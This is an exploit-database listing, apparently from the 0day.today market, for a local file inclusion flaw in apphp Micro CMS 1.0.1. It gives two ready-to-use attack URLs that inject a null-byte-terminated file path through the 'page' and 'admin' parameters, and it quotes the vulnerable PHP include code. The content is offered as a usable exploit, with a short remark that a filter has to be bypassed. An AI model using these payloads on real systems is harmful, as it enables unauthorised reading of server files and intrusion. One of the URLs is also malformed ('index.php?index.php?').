[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

apphp Micro Cms 1.0.1 Local File Include Vulnerability

Author
JiKo
Risk
[
Security Risk High
]
0day-ID
0day-ID-22289
Category
web applications
Date add
29-05-2014
Platform
php
----------[exploit Debut]

[Local File Include Vulnerability]

----------[Author Info]

 

Name : JIKO

 

----------[Script Info]

 

Site        : http://www.supersimple.org/

Download    : http://www.apphp.com/downloads_free/php_microcms_101.zip

Name        : Micro Cms

Version        : 1.0.1

 

----------[exploit Info]

 



~[LFI]

http://path/index.php?index.php?page=FILE%00 (you need to baypass the filter)

http://path/index.php?index.php?admin=FILE%00 (you need to baypass the filter)



if (($page != "") && file_exists("page/" . $page . ".php")) {

                        include_once("page/" . $page .



".php");

                    } else if (($admin != "") &&



file_exists("admin/" . $admin . ".php")) {

                        include_once("admin/" . $admin



. ".php");

                    }

------------------------------------------------------------------

#  0day.today [2024-11-15]  #